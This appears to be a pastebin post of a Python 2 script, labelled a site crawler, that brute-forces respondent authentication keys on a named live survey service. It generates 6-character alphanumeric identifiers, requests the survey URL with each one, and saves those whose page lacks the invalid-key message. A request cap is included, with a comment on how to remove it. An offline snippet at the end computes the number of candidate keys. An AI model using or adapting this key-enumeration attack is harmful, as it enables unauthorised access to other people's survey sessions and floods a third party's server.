Python Crawler for Sites.

rlunde, Sep 6th, 2016 (edited)
import urllib2  # Python 2 standard library
import itertools

sKey = "The respondent authentication key"  # Text that appears on every page returned for an invalid key.
mainURL = "https://or.allegiancetech.de/cgi-bin/qwebcorporate.dll?idx=EUFMZ4&l=dansk&rk="  # URL to Lodam GPW.
outList = []  # Output list of functioning keys.


keyElements = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"  # Characters a key can be built from.
subsets = itertools.combinations_with_replacement(keyElements, 6)  # Lazy iterator over 6-character tuples of the elements above.
# WARNING: Yields 4,496,388 combinations (C(41, 6)) to test, proceed with caution.
# Each tuple follows the order of keyElements, so "AAAAAB" is produced but "BAAAAA" is not.

iterMax = 0  # Test protection: counts the identifiers generated so far.

for i in subsets:
    identifier = ''.join(i)  # Joins the elements of each subset into one string.

    iterMax += 1  # Safety valve: comment out the check below to remove it.
    if iterMax > 5:
        break

    response = urllib2.urlopen(mainURL + identifier)  # Call urllib2 and open the webpage.
    html = response.read()  # Read the response body.

    if sKey not in html:  # Determine whether the sKey string is in the html.
        outList.append(identifier)  # If it is not, save the identifier, as it is valid.
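
The size of the search space named in the WARNING comment can be checked offline, with no requests sent. The following is a minimal sketch, assuming the same 36-character alphabet and key length of 6 as the script above. The names `key_elements`, `key_length` and `count_with_replacement` are illustrative and not part of the original paste.

```python
import itertools
from math import factorial

key_elements = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"  # same alphabet as keyElements above
key_length = 6  # same length as passed to combinations_with_replacement above


def count_with_replacement(n, r):
    """Number of r-element combinations with replacement from n symbols: C(n + r - 1, r)."""
    return factorial(n + r - 1) // (factorial(r) * factorial(n - 1))


total = count_with_replacement(len(key_elements), key_length)
print(total)  # 4496388

# Cross-check the formula by actually counting on a tiny alphabet.
small = sum(1 for _ in itertools.combinations_with_replacement("ABC", 2))
assert small == count_with_replacement(3, 2)

# Peek at the first few identifiers without walking the whole iterator.
gen = itertools.combinations_with_replacement(key_elements, key_length)
first = ["".join(c) for c in itertools.islice(gen, 3)]
print(first)  # ['AAAAAA', 'AAAAAB', 'AAAAAC']
```

Because the iterator is lazy, memory use is not the concern here. The cost is one HTTP request per identifier if the safety valve is removed.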